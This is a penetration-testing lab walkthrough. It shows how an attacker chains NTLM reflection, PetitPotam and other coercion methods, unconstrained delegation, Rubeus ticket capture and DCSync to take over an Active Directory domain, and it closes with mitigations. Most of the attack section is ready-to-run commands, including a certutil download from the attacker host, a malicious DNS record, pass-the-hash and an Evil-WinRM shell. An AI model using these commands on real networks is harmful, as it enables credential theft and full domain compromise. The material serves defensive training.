In Active Directory environments, delegation abuse via NTLM reflection is a common attack technique. Attackers exploit misconfigured delegation settings to reflect NTLM authentication back to target systems, enabling them to impersonate users, escalate privileges, and gain administrative access without needing passwords.

Active Directory (AD) compromises rarely require zero-day exploits. Attackers can gain full domain control by exploiting misconfigurations and abusing built-in protocols like NTLM and Kerberos.

Starting with a low-privileged account, attackers chain:

• Delegation misconfigurations to impersonate users
• NTLM relay attacks to authenticate without knowing plaintext credentials
• Kerberos ticket abuse (Pass-the-Ticket, Golden Tickets) for escalation and persistence

Key takeaway: No exploit is needed — just weak configurations and protocol abuse.

Table of Content

• Introduction
• Attack Flow & MITRE Mapping
• Methodology Overview
• Key Concepts
• Coercion Techniques
• Lab Setup & Prerequisites
• Security Misconfigurations (SMB + Delegation)
• Enumeration & Exploitation
• Post Exploitation
• Domain Escalation (TGT + DCSync)
• Final Access
• Mitigation

Attack Narrative & MITRE ATT&CK Mapping

Initial access was gained using valid low-privilege credentials, enabling AD enumeration. A system with unconstrained delegation was discovered, shifting the attack path.

Using NTLM relay (→ T1557), authentication from a high-value system was coerced to gain elevated access. With SYSTEM control on the delegated host, Kerberos tickets were captured and abused (→ T1558).

The Domain Controller’s TGT was extracted and reused, allowing credential dumping (→ T1003) and lateral movement across the domain (→ T1021), leading to full compromise.

Attack Methodology Summary

1. Enumeration of Misconfigurations — Using low-privileged credentials, the attacker identified WKS-01 with Unconstrained Delegation enabled and SMB signing disabled, making it susceptible to relay and ticket abuse.
2. DNS Manipulation for Traffic Redirection — A malicious DNS record was added in the Active Directory environment, pointing a controlled hostname to the attacker system to redirect authentication requests.
3. NTLM Relay Setup and Authentication Coercion — An NTLM relay listener was initiated using ntlmrelayx, and the target machine was coerced into authenticating to the attacker via multiple RPC-based techniques.
4. NTLM Reflection and Initial System Compromise — The captured authentication was relayed back to the same host (reflection attack). Due to disabled SMB signing, authentication succeeded, enabling dumping of local SAM hashes.
5. Delegation Abuse and Domain Controller Ticket Capture — From the compromised delegated host, the Domain Controller was coerced to authenticate, resulting in capture of its Kerberos TGT.
6. Ticket Abuse and Domain Compromise — The captured TGT was injected and used to perform a DCSync attack via Impacket, achieving full domain compromise.

Key Concepts

Core Techniques

• Unconstrained Delegation — A misconfigured system can impersonate users whose Kerberos tickets are present in memory after authentication. If a domain admin logs into this server, the attacker can use that session to access the Domain Controller.
• Coercion — Kerberos tickets are only cached when a system authenticates to the delegated host. Coercion forces the Domain Controller to connect and expose its TGT. Unconstrained delegation alone is not exploitable without coercion.
• NTLM Relay — An attacker forces a user to authenticate to a malicious system, then relays that authentication to a file server. A compromised workstation can relay an admin’s login to gain access to shared drives.
• Kerberos TGT Abuse — Capturing a TGT for a service account or Domain Controller allows attackers to authenticate as that account to services within the domain.

Authentication Coercion Techniques

• DFSCoerce — Abuses DFS services to force a system (like a Domain Controller) to authenticate to an attacker-controlled machine.
• PetitPotam — Exploits EFSRPC to trigger authentication requests, often used to coerce Domain Controllers into leaking credentials.
• PrinterBug — Leverages the print spooler service to force remote authentication, commonly used for lateral movement and relay attacks.
• MS-EVEN — Uses Event Log RPC to trigger outbound authentication from a target system to the attacker.

Prerequisites & Lab Setup

Requirements

• Attacker Machine: Kali Linux — NXC, Rubeus, Evil-WinRM, krbrelayx, Impacket, DNS manipulation tool
• Target Environment: Active Directory domain (ignite.local)

Lab Configuration

• Domain User Account:local\jack
• Domain Controller (DC-01):168.188.100
• AD Joined Client Machine (WKS-01):168.188.101
• Attacker Machine (Kali): 168.188.131

Reviewing Domain Security Policies (Group Policy Enumeration)

Ensure that SMB signing is enabled on the Domain Controller.

On the Domain Controller

Reviewing Domain Security Policies (Group Policy Enumeration) — Ensure that the SMB signing is enabled on the Domain Controller.

• Open Group Policy Editor: msc
• Navigate to: Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options
• Set Digitally Sign Communications (always) to Enabled

 

What was reviewed:

The highlighted setting, Microsoft network server: Digitally sign communications (always), is a security policy that determines whether the SMB server component requires all inbound communication to be digitally signed.

On the Client Machine

• Open group policy editor (gpedit.msc)
• Set Digitally Sign Communications (always) to Disabled

SMB signing ensures that:

• Data exchanged between client ↔ server is authenticated
• Messages are not tampered with (integrity protection)

“Digitally sign communication (always)” = Disabled means:

• SMB signing becomes optional (or not used at all)
• Systems will accept unsigned SMB traffic
• No integrity verification of SMB packets

This becomes a security issue because it enables NTLM relay attacks and Man-in-the-Middle (MITM) scenarios.

NTLM Relay Attacks

• Tools like Responder or ntlmrelayx
• Attacker captures NTLM authentication
• Relays it to another system
• Gains access without cracking the password

Identifying Delegation Configuration (Critical Misconfiguration)

Setup Delegation Configuration (Critical Misconfiguration)

Active Directory Users and Computers (dsa.msc) → Navigate to Computers → Right-click on WKS-01 → Properties → Delegation Tab

Select “Trust this computer for delegation to any service (Kerberos only)”

What this means:

This system is configured with Unconstrained Delegation.

This allows the machine to:

• Receive Kerberos authentication from users
• Store their Ticket Granting Tickets (TGTs) in memory
• Reuse those tickets to impersonate users

Why this is critical:

If a high-privileged system (like a Domain Controller) authenticates to this machine:

• Its TGT will be stored in memory
• Attacker can extract and reuse it
• Leads to domain-level compromise

Enumeration & Exploitation

Stage 1: Identifying Vulnerable Configuration

The attacker begins with valid low-privileged domain credentials and performs enumeration of the Active Directory environment.

Enumerating Delegation via Impacket

Using impacket-findDelegation, the attacker queries the domain controller to enumerate delegation configurations using valid domain credentials, helping pinpoint systems that can be abused for privilege escalation.

impacket-findDelegation -dc-ip 192.168.188.100 ignite.local/jack:Password@123

The output confirms that Unconstrained Delegation is enabled on WKS-01. With Unconstrained Delegation, when any account authenticates to WKS-01, its Kerberos TGT is cached in memory (LSASS).

Enumerating SMB Signing

nxc smb 192.168.188.101

During enumeration:

• A workstation (WKS-01) is identified with Unconstrained Delegation enabled
• SMB signing is found to be disabled, allowing unsigned SMB communication

Stage 2: NTLM Reflection → Initial System Compromise

Adding a Malicious DNS Record

A malicious DNS record is added in the Active Directory-integrated DNS zone, mapping a controlled hostname to the attacker’s IP. Install the DNS manipulation tool using DNStool from the krbrelayx repository.

git clone https://github.com/dirkjanm/krbrelayx
cd krbrelayx && ls

The command connects and binds to the target host using valid domain credentials, then injects an additional DNS record pointing to the attacker IP (192.168.188.131):

python3 dnstool.py -u ignite.local\\jack -p Password@123 -a add -r WKS-011UWhRBAAAAAAAAAAAAAAAAYBAAAAAAA -d 192.168.188.131 192.168.188.100

This allows redirection of authentication requests to the attacker system, enabling credential capture or NTLM relay attacks.

Launching NTLM Relay Server

An NTLM relay server is started targeting the vulnerable machine wks-01.ignite.local (192.168.188.101):

impacket-ntlmrelayx -t wks-01.ignite.local -smb2support

This sets up a relay service that listens for incoming authentication requests and forwards them to the target system. We passively wait for incoming authentication attempts from systems within the network.

Authentication Coercion (PetitPotam)

The nxc smb tool with the PetitPotam method is used to coerce the target workstation (WKS-01) to authenticate to the listener:

nxc smb 192.168.188.101 -u jack -p "Password@123" -M coerce_plus -o METHOD=PetitPotam Listener=WKS-011UWhRBAAAAAAAAAAAAAAAAYBAAAAAAA

The attack successfully exploits the EFSRPC service, confirming the system is vulnerable to PetitPotam.

Why it matters: This technique forces privileged accounts to authenticate to the attacker, enabling NTLM relay or further privilege escalation in the Active Directory environment.

NTLM Reflection & Initial System Compromise

Following successful coercion, NTLM authentication from the target system was captured and relayed back to the same host (NTLM reflection) using ntlmrelayx, resulting in authentication as the WK-01 machine account.

Due to the absence of SMB signing enforcement, the relay attack succeeded, allowing remote execution of privileged operations. This enabled extraction of local SAM database hashes, including the Administrator account, confirming full compromise of the system.

Post Exploitation

Privileged Access on Delegated Host

Using extracted credentials:

• Pass-the-Hash is performed
• SYSTEM-level access is obtained on WKS-01

SMB Access via Pass-the-Hash

Using the extracted administrator hash to authenticate to the target system over SMB:

nxc smb 192.168.188.101 -u administrator -H a29f7623fd11550def0192de9246f46b --local-auth

This demonstrates a successful pass-the-hash attack, where authentication is achieved without the plaintext password, confirming full compromise of the target.

Achieving SYSTEM Access

Using impacket-psexec with the administrator hash to gain SYSTEM-level access on the target:

impacket-psexec Administrator@192.168.188.101 -hashes :a29f7623fd11550def0192de9246f46b

The result confirms nt authority\system, giving full control over WKS-01.

Hosting Post-Exploitation Tools

A simple HTTP server is started to host post-exploitation tools and payloads:

python3 -m http.server 80

This prepares a delivery mechanism, allowing tools and scripts to be easily accessed and executed on compromised systems for further attacks or persistence.

Transferring Rubeus

Downloading Rubeus to the target system using certutil:

certutil -urlcache -f http://192.168.188.131/Rubeus.exe Rubeus.exe

Rubeus allows manipulation of Kerberos tickets, enabling actions such as ticket extraction, forging, and abuse for privilege escalation and persistence.

Monitoring Kerberos Tickets

Running Rubeus to continuously monitor incoming Kerberos tickets:

rubeus.exe monitor /interval:1

This allows capture of TGTs as they appear in memory. Systems with unconstrained delegation store these tickets, making them accessible for reuse and privilege escalation.

Domain Controller Coercion

Using nxc smb with the coerce_plus module to force the Domain Controller to authenticate to the compromised host (wks-01):

nxc smb 192.168.188.100 jack -p "Password@123" -M coerce_plus -o Listener=wks-01.ignite.local

The attack successfully exploits multiple RPC-based coercion techniques such as DFSCoerce, PetitPotam, PrinterBug, and MS-EVEN.

Why it matters: The resulting authentication can be captured and relayed, enabling further exploitation such as privilege escalation or domain compromise.

Capturing Domain Controller Kerberos TGT

After coercion, the Domain Controller authenticates to WKS-01, causing its TGT to be cached in memory, which is then captured using Rubeus.

The attack resulted in the capture of a valid Kerberos TGT for the Domain Controller machine account (DC-01$). Since Domain Controllers possess replication privileges, this ticket can be used to authenticate as the DC and perform directory replication (DCSync), allowing extraction of all domain credential hashes and effectively granting full administrative control over the Active Directory environment.

Pass-the-Ticket & DCSync

Converting Ticket Format

Save the TGT into a base64 file. Convert the captured ticket into a Linux-usable format:

base64 -d tc.b64 > tc.kirbi

Using impacket-ticketConverter to convert .kirbi ticket to ccache format:

impacket-ticketConverter tc.kirbi dc01.ccache

This step transforms the ticket into a Linux-compatible format, allowing reuse with other tools for authentication and further exploitation.

Injecting and Verifying Ticket

Loading the converted ticket into the session and verifying it:

export KRB5CCNAME=dc01.ccache
klist

This allows assumption of the identity of the Domain Controller, confirming successful ticket injection and enabling authenticated actions as a highly privileged entity.

Dumping Domain Credentials

Using the injected Kerberos ticket to authenticate into the Domain Controller and dump domain credentials:

 impacket-secretsdump -k -no-pass dc-01.ignite.local

This successfully extracts domain hashes, including the Administrator account, confirming full domain compromise and complete control over the Active Directory environment.

Final Access

Remote Access via Evil-WinRM

Using the administrator hash to establish a remote shell on the Domain Controller:

evil-winrm -i 192.168.188.100 -u Administrator -H a29f7623fd11550def0192de9246f46b

The connection is successfully established, confirming access as ignite\administrator. From this shell, commands can be executed, network configuration verified, and the compromised system fully interacted with.

This step confirms complete administrative control over the Domain Controller and the Active Directory environment.

Conclusion & Mitigation

Conclusion

This attack demonstrates how misconfigurations — not vulnerabilities — can lead to full domain compromise.

By chaining the following techniques, an attacker can move from a low-privileged user to complete control of Active Directory:

• NTLM relay — exploiting disabled SMB signing to relay authentication
• Unconstrained delegation — capturing TGTs from high-value systems
• Kerberos ticket abuse — performing DCSync and gaining all domain hashes

Mitigation

• Disable Unconstrained Delegation — Use constrained or resource-based constrained delegation instead
• Enforce SMB Signing — Prevent NTLM relay and MITM attacks on SMB traffic
• Restrict NTLM Authentication — Block or audit NTLM usage; prefer Kerberos
• Disable Printer Spooler — Remove the service if unnecessary to prevent PrinterBug coercion
• Monitor Kerberos Anomalies — Alert on unusual TGT requests, large ticket volumes, or DCSync activity

Author: MD Aslam drives security excellence and mentors teams to strengthen security across products, networks, and organizations as a dynamic Information Security leader. Contact here